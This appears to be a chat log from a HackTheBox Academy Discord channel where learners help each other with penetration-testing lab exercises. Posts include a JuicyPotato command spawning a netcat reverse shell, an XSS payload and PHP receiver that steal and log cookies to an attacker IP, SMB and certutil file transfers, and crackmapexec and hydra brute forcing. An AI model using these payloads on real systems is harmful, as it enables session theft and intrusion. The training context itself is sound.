like 3 days for password attacks and a day and a half for common services.
But dont compare yourself to me
Everyone learns at a different pace
for example, I did both AD skills assessments in 8 hours. Most of the people who I've asked all said it took them roughly 8 hours just to finish the second one
Would I need to download tools/exploits to the database? I see the user can be exploited to escalate privileges but I have attempted to download multiple things to it for that past day but have been unsuccessful in doing so.
dm me. Dont wanna spoil anything here
lmk what youve tried so far
Will do thank you!
Hi, started cbbh and going through web requests module, and was wondering the following:
Is there anything that cannot be done without burp suite? using browser dev tools, curl and python scripting, would that in general be enough to replace any need for zap/burp suite, or are there advanced things they do that makes it hard to not use them?
Good evening. Could someone help me with the "Password Attacks Lab - Hard" module?
Instead of asking if you can "ask someone for help" just ask your question
you're more likely to get a response
oh well I didn't want to rush through the door
All good, but its always better to just ask your question
well. I was able to crack the *.vhd file and mount it on my Linux system. I got the SAM and System database. I extracted the info with samdump2 and received the Admin hash. Unfortunately after cracking the hashes with either hashcat or john it shows an empty pw. Also crackstation shows an empty pw. I wasn't able to use either of them for authentication.
dm me
Don’t ask him he’s a genius
some hints please on assessment 2 of NOSQLI
my SSJI payloads wont succeed, not sure what to try next
I've checked the permutations for both password, and password1. I've applied the custom.rule rule, but with absolutely no favourable outcome. I'm now lost AF. Have u used any other permutation rules, or went with the provided one?
Anyone on here completed the Windows Privilege Escalation Skills Assessment I? I can't get Juicy Potato to work no matter what listening port I use. The command I'm using is .\JuicyPotato.exe -l 47001 -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\nc.exe 10.10.16.24 8443 -e cmd.exe" -t *
anyone know why i get a separator unmatched error when using hashcat to crack hccapx files? thank you
hi crean! finally managed to login to smtp after reading the smtp tutorial auth base64 encoding:
```
EHLO inlanefreight.htb
250-WIN-EASY
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
Username in base64
334 UGFzc3dvcmQ6
Password in base64
235 authenticated.
```
but then I have to intercept the email that I've sent?
hi folks! module *attacking web applications with ffuf - skills assessment*; the question is: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I've tried the recursive scan for each subdomain that I've found previously but no luck in finding anything relevant. Anyone available for a nudge or/and some help? Thank you
👀
im not sure but try the -ms flag in ffuf to scan the response text for a given set of words, just like "You don't have access!"
so lonely in the vc 👀
@rustic sage did u try with evolution
this is a new one!!
is that for smtp stuff?
will try at once 👍
yes lager
if you prefer console you might wanna just try mutt then 🙂
no GUI like setup needed, no account setup needed, pretty much just like another terminal command 😄
thanks for the advice, awesome !!!!
thanks a lot,lager!!!
wheres your avatar from btw? 😄
tried with both the -fs and -ms flag, but no luck..
curl -v http://ip/admin?
looks more like an anime 😄
seems that it's a bit old already (no offence) 😄 why this one specifically and not some "mainstream" thing like pokemon? 😄
calling sailor moon a cartoon kills my soul. Also extremely off topic.
bruh sailor moon IS mainstream
Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:
AD Enumeration & Attacks - Skills Assessment Part II im on the question:
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I have an open xp_commandshell and logged into the database. Attempted to transfer nc64.exe to gain a reverse shell and an exploit for privilege escalation but won’t transfer.
won’t transfer.
what does that mean exactly?
what are using to transfer
Certutil.exe and attempted Invoke-WebRequest. Getting the "200" from the python web server hosting on the attacker machine and "-URLCache command completed successfully" but not shown in the system32 directory.
curl http://your.box/nc64.exe -Outfile ./nc64.exe?
try writing to a different folder?
or at least test that you have write access first
I attempted C:/Windows/Temp and still the same.
I will try this
can also just try smb hosting the file
or skip dropping a file altogether for now and use meterpreter smb delivery and use rundll32 to remotely load a meterpreter shell.
then use that to do whatever you need to do
Hi, I'm starting HTB from the start. One question to ask.
If I am starting a box, how will I prepare for attacking that box?
in the basis of knowledge
you sound like a good candidate for the Intro To Infosec fundamentals skill path
do that, and then do all the starting point machines from the main site
is it available in htb or do i have to learn from other source?
and can you explain, what exactly is that?
the skill path is a collection of modules on htb academy
@thorn urchin
I answered
Tried and received the following message: “You can’t access this shared folder because your organization’s security policies block unauthenticated guest access.”
I would like to transfer files into the database without the help of metasploit as I am studying/practicing for OSCP and would like to do things the manual way. I will probably need to use metasploit though..as no file transfer methods seem to be working..
you have to host the share with authentication
How do you connect to a windows machine from the academy parrot vm - been stuck on active directory for 3 days - lol
wdym by connect
when I look at the help pictures they show using windows - but when I read it seems they use linux
I am confused lol
Im confused by what youre confused by
why wont the ip address i got provided load anything in firefox? it just says "cant connect"
for?
which active directory stuff, which module?
Introduction to Windows Command Line
It probably has an instance to spin up at the bottom and itll tell you how to connect to it
kk ill keep at it some of just one ip and no log ins
but I have not been able to get a windows environment to pop
you may need to take the intro to academy module first
cause ya seem to be missing how the structure of the modules work
That makes sense..attempted to append -username and -password with all credentials found in the answers from the AD Enumeration & Attacks - Skills Assessment Part II (including the provided attacker machine credentials) but receiving a message stating "the username or password is incorrect".
the authentication is what you set up when youre hosting the smb share
like if youre using impacket-smbserver it defaults to guest creds but you can supply arguments for authentication instead
doesnt need to be a real account
Like this? Not real user or password..
yea that looks about right
you have to connect to the share using net use. net use n: \\<ip>\<sharename>
Then you can simply copy files from the n drive. copy n:\filename .
Yes
Never done this before. I will do some research and give it a shot
why is there a macOS fundamentals module if there are no HTB Academy modules or HTB boxes that are about hacking macOS?
hi, quick question: in "getting started" module section "Privilege Escalation" the second Question root priv escalation, the hint mentions "chmod" but I managed to get the root flag by means of ssh. Did I miss something in that lesson? I did run linpeas but couldn't exploit dirtypipe successfully.
Relevant question.
I personally think it's because macOS is more or less "Linux" (forgive me for using it loosely) with its access to shell, and one may get to use it sometime during one's journey in career, so I guess it wouldn't hurt to be familiar.
This is just my opinion. There could be plans to introduce a macOS hacking module.
@quasi wave
maybe thats a hint on the status code 405 not permitted, try to find a 405 or similar
got it at the end! thank you
was it the 405?
no, ended up using the -mr flag for regular expressions to match part of the response expected
can give me someone a hint for NOSQLI assessment 2 - SSJI a hint what im doing wrong?
the encoded payload im using is `" || true || ""=="`
what's SSJI?
server side javascript injection
nosqli and javascript? huh, sounds like a weird combination
afaik nosqli is not directly tied to javascript
its exclusive to nosql with the $where clause
here u cn see
ok, well sounds a bit specific. I'm not saying it's impossible
but if you're really going for injecting javascript, you probably don't want to tamper with the actual results of the nosqli query and rather do code exec, hmm?
in this module it's used in the $where clause, it is basically appending your own js into the query
to get a bypass or fetch data from db by enumerating
well if you have an idea how the query looks like, it should be somehow easy to know what to inject in there ..
i haven't worked with nosql db for many years so i'm pretty rusty with nosqli, id probably go with something like { $ne : null } or so
i tried to use all the payloads from the learning chapters, but in the assessment i cant get it working, maybe a filter on server side
haven't done it, so can't tell
this is for assessment 1, part 2 is specific for ssji
i try it for 4 days now, i just want to finish it xD
can't really help on this specifically, if you're having trouble debugging your payloads, just get back to some basic ones and work your way up
frustrating
that's the best way in my experience
So the share got authenticated successfully but I'm getting "access denied" when trying to copy the file from the share. Am I inputting something incorrectly?
just use one command
possibly if you paste some data, but i haven't done anything from academy myself
You sure you have write permission to where youre trying to copy the file to?
payloads or so
Apparently I didn’t and copied to Temp directory and shows it was copied..but “dir c:\Windows\Temp” not showing anything in there..
and what are you injecting to?
└─$ cat script.js
```javascript
new Image().src='http://YOUR_TUN0_IP/index.php?c='+document.cookie
```
the website input is vuln to xss
just do copy \\your.box\share\nc c:\windows\temp
change the ip from 0.0.0.0 to your tun0
the other user that loads the script.js needs to know where to call
in that case its your machine
so a valid ip is needed
remove the first payload from script.js
just use the new Image() one
Tried with and without the “nc64.exe” in the Temp directory
it would be much better if you can just copy paste the code and not paste a photo each time 😄 maybe just copy it to c:\, i don't know 😄 try experimenting a bit yourself
at least it shows you that it grabbed the file this time
sudo php -S 0.0.0.0:80
0.0.0.0 means all requesting IPs are passed through
not just a specific, like a whitelist
and use port 80, not https
also make sure you are in the same folder as the files, when running your php server
Been experimenting/trying for the past 3 days and why I have succumbed to asking for help here. 😆. Sorry I will just paste commands and not take pics everytime. I’m just on discord on my phone and not logged in on my Kali machine..lol
copy pasting code is much more accessible for me and possibly easier for you as well i think
It's fine to ask for help, my point is that you might need to "debug" the commands that you get here a little. I haven't done any of the academy stuff i have no clue what exact command is needed
Oh I understand. No worries
The point of experimenting should be that you work your way up by things like confirming that the file is downloaded from your box, written to the target box and so on
hopefully you get that
Understood. Thank you
but do you see a connection from the victim? on you php server
in the console
did you insert the xss into the "website" input field?
anyway, don't feel like I'm discouraging you from pasting more stuff in here, i'd be glad to help more or to see further errors you need to deal with
└─$ cat index.php
```php
<?php
// Receiver for the XSS payload: each cookie passed in ?c= is logged
// to cookies.txt together with the requesting client's IP address.
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```
Thank you! 😃
is anyone willing to help with my DNS enumeration issue
I am working on this question:
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
this is the command i am running:
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
i cant remember the exact xss payload i used, i need to check
i understand that subdomains have subdomains. my issue is i have tried all the wordlists in the directory on the subdomains from the initial scan. however, i am making no progress
need more context on that
i'm not familiar with dnsenum
@high sentinel
```
ns.inlanefreight.htb.    604800 IN A 127.0.0.1
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
app.inlanefreight.htb.   604800 IN A 10.129.18.15
```
Subdomains of subdomains
i'd do something like dig @inlanefreight.htb -x x.x.x.203
@fathom pendant is this not the right direction?
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
As stated, you can have subdomains of subdomains i.e. a.b.inlanefreight.htb
So that's a start, but not the end
im trying right now, i have no notes on that 😄
If you're still having issues dm me, I am on my meal break at work so may not respond right away
<script src="http://10.10.xx.xx/script.js"></script>
for me its working
thats the payload to put into the website input field
there is no encoding
i did paste it like that
yes "> is %22%3e
so you have your machine ip in script.js, and also in the xss payload
and you dont have other tun open?
@rustic sage and u did it in here?
website input field is the vulnerable field
like i said 3 times now haha
haha
nah
did you do php -S 0.0.0.0:80?
okey it connected
http://10.129.56.1/assessment/index.php/2021/06/11/welcome-to-security-blog/#comment-7
and you are in the /assessment/index.php ?
like the listener on the other side wont "click" it
wow im out of ideas
Borked
anyone there
GladOS?
yes try it
thats the one i tested right now
ima go to bed now
good luck next time
I figured it out finally! 🙌
Yes! I was losing my sh** on this one! 😂
This can be considered spoiler
My apologies. Just edited post.
No problem! It's just one of those exciting things
That’s exactly what it was..stuck on that one for 3 days!! And I do mean full days and late nights sadly..was my days off work. Lol
not sure if this is the right place, sorry if not, i cant write messages in other places.. i'm trying to solve the machines but all the ports keep coming back as filtered when i scan. i tried resetting, reconnecting, and different machines but they all come back as filtered. any help would be appreciated
Windows PrivEsc Skills Assessment I. What the hell is going on here? JuicyPotatoNG and I'm still not able to connect because of the COM server port.
Bump... still stuck.
brute forcing is a thing? 😄
isn't it more just about using anonymous session or so?
haven't done it so i don't know for sure. Can possibly help if you're interested
Yeah, it's a thing lol. It's described in the section, using crackmapexec.
And they provide a password list to use; there is also another password list you gain from cracking FTP in the previous exercise. But neither of those lists seem to work for the SMB section.
how come? are you using the lists correctly?
As far as I am aware, yes...
what tools did you try to use?
Tried both medusa and crackmapexec
and both failed?
Both run through the lists until the end and don't return any credentials.
so you've tried using some verbose mode or so, right? (getting something like unsuccessful login attempt for user xyz)
Yeah, all of the results come back in the same fashion, e.g., \jason:badger STATUS_LOGON_FAILURE
hmm, are you sure your username is correct?
I mean, it's the one I'm instructed to use
and the syntax of the commands? \jason does not seem like a correct form of the argument, but it might be just the output of local auth of a tool
Yeah, that's just the crackmapexec output, I'm calling it like:
crackmapexec smb A.B.C.D -u jason -p password.list
i'd do crackmapexec smb -u jason -p password.list A.B.C.D
cme is sometimes a bit weird about argument positioning
but if you tried medusa as well, it's probably not the issue
hmm, this is quite strange really
well, maybe .. did you try ||passing the username as password||?
The full output seems to suggest it's doing it correctly:
SMB A.B.C.D 445 ATTCSVC-LINUX [-] \jason:kevin STATUS_LOGON_FAILURE
It actually already exists in the provided list, so that would have been checked.
hmm, possibly a machine name may be needed? looks like it's a linux box running smb which is not that common
like ATTCSVC-LINUX\jason?
Do you mean a Linux box running SMB?
I see that several people have asked but didn’t notice an answer anywhere. Is the footprinting-easy lab, is it possible to find the password without looking at the hint?
ATTCSVC-LINUX -> suggests that the target box is running linux
of course 😄
the hints don't need to be taken 😄
Yeah, I get that, you just said "looks like it's a windows box running smb" lol.
any idea is that's a dc? you could try adding --local-auth
Thanks
iirc -d domain, which could possibly (?) help as well
Nothing would suggest it is, given the preceding module contents and what's been taught. So unless HTB is pulling a trick on me, I doubt it...
can't really tell
Side note: It's odd placing the IP at the end of the command causes cme to terminate immediately with no output, whereas placing it after the smb protocol flag, works 
Well thats just syntax. The help menu specifically says the options come after the IP
linux syntax ftw, cme is just weird
Bingo.
try using known password now just with --local-auth
that could possibly work as well
(without the machine name)
I'll give it a shot
Yes, that works; the output is the same as when I was using -d, but it automatically used the machine name. Which is great to know for the future!
Thanks for the nudge(s) 
DM me your profile link
i'm using the same name as here 🙂
so, what's the next target? 😄 bruteforcing http? 😄
Bruteforcing notepad.exe 😄
how is that done? teach me 🙂
Not sure, haven't learnt it myself yet!
dam 😄
Lolbins are wild
What’s the fastest way to brute FTP? Hydra? Anything other? Thread count?
I've always had good success with Hydra
Thread count will vary based on the server/network
What’s the highest you can go? I’m just starting to mess with it
FTP is a little bit slow, so I usually start with the default (16) and watch it for a little bit
Be careful with thread count. You can dos
Then adjust up/down based on timeouts, etc.
does anyone need help at the moment? 😄
Not right now unfortunately
person, modules chat is not for flirting
hi .. when i'm running GetUserSPNs i'm getting KRB_AP_ERR_SKEW.. i've tried to setup ntp as ntpdate 172.16.8.20 but i got : ntpdig: no eligible servers ...any clues ?
DMs and gen chat are for flirting
Gen chat for flirting lmao
CLOCK_SKEW_TOO_GREAT?
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
yeah, that's it
ntpdate ip should be working just fine
possibly some verbose/debug flag?
you can set the time manually as well, ntpdate is just much easier, it depends how badly you need the ntpdate. You could possibly debug it using nmap udp scan on the ntp port
tried manually as well - moved my vm to the same time zone as DC but still the same : |
Who’s flirting?
Slightly confused; the Attacking SQL Databases section continually makes references and has examples using sqsh - but neither pwnbox nor ParrotOS HTB edition has it installed.
That sounds like something to bring up in #858470491676737536 especially if pwnbox doesn't have it
can i dm you?
Medium lab. FTP what am I doing
i think this is my vpn ..anybody else having an issue where every 4 min vpn drops and reconnects like "2023-01-13 13:40:24 [htb] Inactivity timeout (--ping-restart), restarting"
```
ps faxuww | grep vpn
root 1041391 0.0 0.1 10100 4820 pts/0 S+ 12:55 0:00 | | _ sudo openvpn academy.ovpn
root 1041392 0.0 0.0 10100 488 pts/1 Ss 12:55 0:00 | | _ sudo openvpn academy.ovpn
root 1041393 0.0 0.2 13500 9240 pts/1 S+ 12:55 0:00 | | _ openvpn academy.ovpn
```
i think there's your problem 😄
if i stop - there is nothing left :
you should be running just one process if i'm correct. If that persists, possibly try switching protocols - TCP/UDP
hmm
stopping vpn kills all
reran the command again and also have 3..
well to be honest nothing changed on my end for a long time
just started getting those dropouts yesterday
possibly try running wireshark on your host then?
and debug if the connection drops at some point
I'm sorry, my emotion gets in the way due to anger
I want to learn how to hack
I have VM and VPN ready
I didn't install kali or parrot VM yet
This will help
Port scanning, I heard, is not good; doing it manually is good...
payload under developer to accept a patch and transmit in the final stage
but unsure of all the steps
I’m looking for some help with the foot printing medium lab. I’ve done some enumeration and I’m trying to access the Techsupport share but I’m not getting anywhere. Using a script in nmap I was able to determine there’s about 10 ticketxxxx.txt files but I can’t get to them. Is this a dead end or am I just missing something?
I’m trying to access the Techsupport share but I’m not getting anywhere
how exactly?
[']
You might need to switch to root to see, or sudo
🤦🏼♂️ thanks. Here I was adding users and switching to everyone but root
if you want to learn, go to academy hackthebox
do I need to go to the darkweb and create an anonymous email or something
I am unsure how to hide my identity and create an acct at hackthebox
deep web*
it all trails back not sure how to fully hide my identity
phone number IP starting points etc etc
phone number is registered under your name unless a prepaid card is used, and it still needs to be registered with your S.S.
there is a trail
They're pointing to the door
backdoor is when you hack something and you want to re-enter?
huh?
dunno what that means
what module is this about?
It's not I'm just playing with them
wait so use a hacked real account through the dark web?
that's the door meaning? spoof??
Anyway you can ask your question in #1024429874246590575
I don't have money for that
You don't need to be anon on htb
You can make a burner email, only access it via a VM over a VPN connection
Which is a lot of work but technically possible
Lager, I see what you're communicating and it's funny
the funny thing is my friends want me to burn on the cross. I don't have money for a lawyer
the people who know me in person want to *politically beat men
I have no way to fend for myself and I am a sitting duck here
That sucks dude and I really don't know what you're looking for here
Not even yourself
Did you ever figure this out? In the same place now...
did you fill in this part {$_SERVER['TARGET']}
also.. you need to add the port your attack machine is listening on, i.e., x.x.x.x:1337
Just now getting back to the AD module skills assessment 2 after a week away... can anyone offer some tips/advice for escalation from an mssqlclient connection?